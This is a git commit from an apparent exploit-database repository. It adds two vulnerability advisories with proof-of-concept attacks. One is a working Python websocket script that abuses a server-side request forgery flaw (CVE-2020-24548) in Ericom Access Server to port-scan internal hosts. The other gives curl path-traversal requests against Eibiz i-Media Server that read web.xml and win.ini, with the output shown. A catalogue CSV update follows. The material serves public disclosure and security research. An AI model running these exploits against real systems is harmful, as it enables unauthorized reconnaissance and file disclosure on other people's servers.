DB: 2020-08-27
3 changes to exploits/shellcodes Ericom Access Server x64 9.2.0 - Server-Side Request Forgery Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal
This commit is contained in:
parent
1567b7af86
commit
8bf2002f51
4 changed files with 229 additions and 0 deletions
170
exploits/multiple/webapps/48765.txt
Normal file
170
exploits/multiple/webapps/48765.txt
Normal file
|
@ -0,0 +1,170 @@
|
|||
# Exploit Title: Ericom Access Server x64 9.2.0 - Server-Side Request Forgery
|
||||
# Date: 2020-08-22
|
||||
# Exploit Author: hyp3rlinx
|
||||
# Vendor Homepage: www.ericom.com
|
||||
# Version: Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0
|
||||
# CVE: CVE-2020-24548
|
||||
|
||||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt
|
||||
[+] twitter.com/hyp3rlinx
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
[Vendor]
|
||||
www.ericom.com
|
||||
|
||||
|
||||
[Product]
|
||||
Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0
|
||||
|
||||
AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser,
|
||||
including from Chromebooks and locked down devices. Ericom Blaze provides remote desktop connectivity from
|
||||
Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI).
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
Server Side Request Forgery
|
||||
|
||||
|
||||
[CVE Reference]
|
||||
CVE-2020-24548
|
||||
|
||||
|
||||
[Security Issue]
|
||||
Ericom Access Server allows attackers to initiate SSRF requests making outbound
|
||||
connections to arbitrary hosts and TCP ports. Attackers, who can reach the
|
||||
AccessNow server can target internal systems that are behind firewalls that are
|
||||
typically not accessible. This can also be used to target third-party systems
|
||||
from the AccessNow server itself.
|
||||
|
||||
The AccessNow server will return an attacker friendly response, exfiltrating
|
||||
which ports are listening for connections. This can bypass Firewall rules and
|
||||
undermine the integrity of other systems and security controls in place.
|
||||
|
||||
E.g. listen using Netcat, Nc64.exe -llvp 25
|
||||
|
||||
A) Ericom Server 192.168.88.152 (defaults port 8080)
|
||||
B) Attacker 192.168.88.162
|
||||
C) Victim 192.168.1.104
|
||||
|
||||
Using Wireshark we can observe A sends a SYN packet to C (port 25)
|
||||
C sends SYN/ACK to A
|
||||
A sends ACK to C.
|
||||
A sends ACK/FIN to C port 25.
|
||||
|
||||
We will then get an AccessNow server response similar to below.
|
||||
["C","M",["Cannot connect to '192.168.1.104:25'.",true]]
|
||||
|
||||
This message indicates we cannot connect and helpfully informs us of closed vs open ports.
|
||||
|
||||
[Affected Component]
|
||||
Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports
|
||||
which are sent using Web-Socket requests. Ericom server then replies with a
|
||||
"Cannot connect to" message if a port is in a closed state.
|
||||
|
||||
|
||||
[Attack Vectors]
|
||||
Remote attackers can abuse the Ericom Access Server to conduct port
|
||||
scans on arbitrary systems. This is possible due to a server side
|
||||
request forgery vulnerability and using a remote TCP socket program.
|
||||
|
||||
|
||||
[Impact Information Disclosure]
|
||||
true
|
||||
|
||||
|
||||
[CVE Impact Other]
|
||||
Exfiltration of open ports
|
||||
|
||||
|
||||
[Exploit/POC]
|
||||
import sys,ssl
|
||||
import websocket
|
||||
##pip install websocket-client #Required
|
||||
|
||||
#By hyp3rlinx
|
||||
#ApparitionSec
|
||||
#========================================================
|
||||
#Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF
|
||||
#========================================================
|
||||
|
||||
BANNER="""
|
||||
______ _____
|
||||
| ____| / ____|
|
||||
| |__ _ __ _ __ ___ _ __| | ___ _ __ ___
|
||||
| __| | '__| '__/ _ \| '__| | / _ \| '_ ` _ \
|
||||
| |____| | | | | (_) | | | |___| (_) | | | | | |
|
||||
|______|_| |_| \___/|_| \_____\___/|_| |_| |_|
|
||||
SSRF Exploit
|
||||
"""
|
||||
|
||||
def ErrorCom(vs,vp,t,p):
|
||||
try:
|
||||
ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE})
|
||||
ws.send("SSRF4U!")
|
||||
result = ws.recv()
|
||||
#print(result)
|
||||
if result.find("Cannot connect to")==-1:
|
||||
print("[+] Port "+p+" is open for business :)")
|
||||
else:
|
||||
print("[!] Port " + p+ " is closed :(")
|
||||
ws.close()
|
||||
except Exception as e:
|
||||
print(str(e))
|
||||
|
||||
if __name__=="__main__":
|
||||
|
||||
if len(sys.argv) != 5:
|
||||
print(BANNER)
|
||||
print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548")
|
||||
print("[+] By Hyp3rlinX / ApparitionSec")
|
||||
print("[!] Usage: <vuln-server>,<port (usually 8080)>,<target>,<port-to-scan>")
|
||||
exit()
|
||||
|
||||
if len(sys.argv[4]) > 5:
|
||||
print("[!] Port out of range")
|
||||
exit()
|
||||
|
||||
print(BANNER)
|
||||
ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
|
||||
|
||||
|
||||
|
||||
|
||||
[PoC Video URL]
|
||||
https://www.youtube.com/watch?v=oDTd-yRxVJ0
|
||||
|
||||
|
||||
[Network Access]
|
||||
Remote
|
||||
|
||||
|
||||
[Severity]
|
||||
Medium
|
||||
|
||||
|
||||
[Disclosure Timeline]
|
||||
Vendor Notification : June 21, 2020
|
||||
Received automated reply : June 21, 2020
|
||||
Request for status : June 30, 2020
|
||||
Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020
|
||||
Request for status : July 13, 2020
|
||||
No vendor reponse
|
||||
Informed vendor advisory: August 11, 2020
|
||||
Request for status : August 20, 2020
|
||||
No vendor reponse
|
||||
August 22, 2020 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
56
exploits/multiple/webapps/48766.txt
Normal file
56
exploits/multiple/webapps/48766.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal
|
||||
# Date: 2020-08-22
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: http://www.eibiz.co.th
|
||||
# Affected version: <=3.8.0
|
||||
# CVE: N/A
|
||||
|
||||
Eibiz i-Media Server Digital Signage 3.8.0 (oldfile) File Path Traversal
|
||||
|
||||
|
||||
Vendor: EIBIZ Co.,Ltd.
|
||||
Product web page: http://www.eibiz.co.th
|
||||
Affected version: <=3.8.0
|
||||
|
||||
Summary: EIBIZ develop advertising platform for out of home media in that
|
||||
time the world called "Digital Signage". Because most business customers
|
||||
still need get outside to get in touch which products and services. Online
|
||||
media alone cannot serve them right place, right time.
|
||||
|
||||
Desc: i-Media Server is affected by a directory traversal vulnerability. An
|
||||
unauthenticated remote attacker can exploit this to view the contents of
|
||||
files located outside of the server's root directory. The issue can be
|
||||
triggered through the 'oldfile' GET parametery.
|
||||
|
||||
Tested on: Windows Server 2016
|
||||
Windows Server 2012 R2
|
||||
Windows Server 2008 R2
|
||||
Apache Flex
|
||||
Apache Tomcat/6.0.14
|
||||
Apache-Coyote/1.1
|
||||
BlazeDS Application
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5585
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5585.php
|
||||
|
||||
|
||||
26.07.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl "http://192.168.1.1/dlibrary/null?oldfile=../../WEB-INF/web.xml&library=null"
|
||||
|
||||
$ curl "http://192.168.1.1/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
|
||||
; for 16-bit app support
|
||||
[fonts]
|
||||
[extensions]
|
||||
[mci extensions]
|
||||
[files]
|
||||
[Mail]
|
||||
MAPI=1
|
|
@ -6,6 +6,7 @@
|
|||
# Version: 5.0
|
||||
# Tested on: Windows 10
|
||||
# Contact: https://www.linkedin.com/in/th3cyb3rc0p/
|
||||
# CVE: CVE-2020-24609
|
||||
|
||||
Stored Cross-site scripting(XSS):
|
||||
Stored attacks are those where the injected script is permanently stored on the target servers,
|
||||
|
|
|
@ -43004,3 +43004,5 @@ id,file,description,date,author,type,platform,port
|
|||
48762,exploits/php/webapps/48762.txt,"LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting",2020-08-24,"Matthew Aberegg",webapps,php,
|
||||
48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,
|
||||
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,
|
||||
48765,exploits/multiple/webapps/48765.txt,"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery",2020-08-26,hyp3rlinx,webapps,multiple,
|
||||
48766,exploits/multiple/webapps/48766.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal",2020-08-26,LiquidWorm,webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue